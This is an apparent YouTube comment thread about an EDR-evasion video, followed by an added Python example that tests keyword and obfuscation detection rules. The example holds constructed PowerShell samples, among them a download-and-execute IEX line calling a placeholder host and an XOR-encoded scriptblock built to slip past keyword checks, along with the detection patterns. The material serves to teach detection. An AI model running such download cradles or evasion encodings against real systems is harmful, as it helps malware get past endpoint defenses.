Another awesome presentation. Thank you for sharing
Thanks for watching!
More great content! Your hard work and creativity really shine through. Keep up the awesome work!
Thank you for showcasing my tool sir
It works! Thanks for your research!
Let's get it, another Cyber Attack & Defense vid
Good topic for everyone, thanks
Awesome, looking forward to more
Thanks! Keep watching for more!
Does it affect different EDR vendors by chance?
It should work against many EDR vendors. You would need to test your specific vendor. I did test against some of the bigger ones and it worked.
❤
Not my field of expertise normally, but just encoding and using eval or equivalent would bypass your check...?
Edit: ahh, of course, you are checking for eval-like keywords as well.
Good question! Any rule I would use in practice would be much more robust in looking for encoding evaluation statements and the like. The good thing is the first pass on many forms of encoding is done by Windows. Nothing substitutes for dynamic analysis with breakpoints, though.
@CyberAttackDefense just implement a custom encoding, that's pretty common.
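As an added illustration of the point in this exchange (example code written for this page, not the video author's rule or tool), the Python below runs a keyword-style rule of the kind discussed over three constructed PowerShell one-liners. The second hides its payload behind Base64 yet still trips the rule, because the decode and evaluation keywords stay visible in the script text; the third uses a custom XOR encoding plus a `[scriptblock]::Create` call and slips past it, which is the bypass the reply describes. A second, looser heuristic shows the kind of extra signal a more robust rule would layer on. The sample scripts, pattern names and heuristics are all constructed assumptions for this example.

```python
import re

# Constructed sample scripts (assumptions for this example, not from the video).
SAMPLES = {
    # 1. Plain download-and-evaluate: the evaluation keyword is right there.
    "plain": "Invoke-Expression (New-Object Net.WebClient)"
             ".DownloadString('http://example.invalid/a.ps1')",
    # 2. Base64-wrapped payload: decode + IEX keywords are still in clear text.
    "base64": "$p=[Text.Encoding]::Unicode.GetString("
              "[Convert]::FromBase64String('SQBFAFgA'));IEX $p",
    # 3. Custom XOR encoding, evaluated via [scriptblock]::Create and the call
    #    operator, so none of the usual eval/decode keywords appear.
    "custom": "$k=0x2A;$c=(67,68,69,89)|%{[char]($_ -bxor $k)};"
              "& ([scriptblock]::Create(-join $c))",
}

# A naive keyword rule: name -> regex for common evaluate/decode indicators.
KEYWORD_PATTERNS = {
    "Invoke-Expression": r"Invoke-Expression",
    "IEX": r"(?<![\w-])IEX(?!\w)",
    "eval": r"(?<!\w)eval(?!\w)",
    "FromBase64String": r"FromBase64String",
    "-EncodedCommand": r"-EncodedCommand",
    "-enc": r"(?<![\w-])-enc(?!\w)",
}
_KEYWORD_RES = {n: re.compile(p, re.IGNORECASE) for n, p in KEYWORD_PATTERNS.items()}

# Looser structural indicators a more robust rule might add on top of keywords
# (constructed heuristics, not a production rule).
OBFUSCATION_PATTERNS = {
    "scriptblock-create": r"\[scriptblock\]::Create",
    "bxor": r"-bxor(?!\w)",
    "char-cast": r"\[char\]\s*\(",
    "numeric-array": r"(?:\d+\s*,\s*){3,}\d+",   # runs of comma-separated integers
}
_OBF_RES = {n: re.compile(p, re.IGNORECASE) for n, p in OBFUSCATION_PATTERNS.items()}


def keyword_hits(script: str) -> list:
    """Names of keyword indicators found in the script text, sorted."""
    return sorted(n for n, r in _KEYWORD_RES.items() if r.search(script))


def flagged(script: str) -> bool:
    """Verdict of the naive keyword-only rule."""
    return bool(keyword_hits(script))


def obfuscation_hits(script: str) -> list:
    """Names of structural obfuscation indicators found, sorted."""
    return sorted(n for n, r in _OBF_RES.items() if r.search(script))


def robust_flagged(script: str, min_obf_hits: int = 2) -> bool:
    """Keyword hit, or at least min_obf_hits structural indicators together."""
    return flagged(script) or len(obfuscation_hits(script)) >= min_obf_hits


if __name__ == "__main__":
    for name, script in SAMPLES.items():
        print(f"{name:7s} keyword-rule={flagged(script)!s:5s} "
              f"robust-rule={robust_flagged(script)!s:5s} "
              f"keywords={keyword_hits(script)} "
              f"obfuscation={obfuscation_hits(script)}")
```

The keyword rule sees the Base64 case only because the decode and evaluation calls are spelled out in plain text; the custom-encoding case carries none of those tokens, and only the structural heuristics (the XOR, the char-code array, the scriptblock construction) give it away. Either static pass is just a filter for what to look at; as the reply above says, breakpoints on the actual evaluation are what settle it.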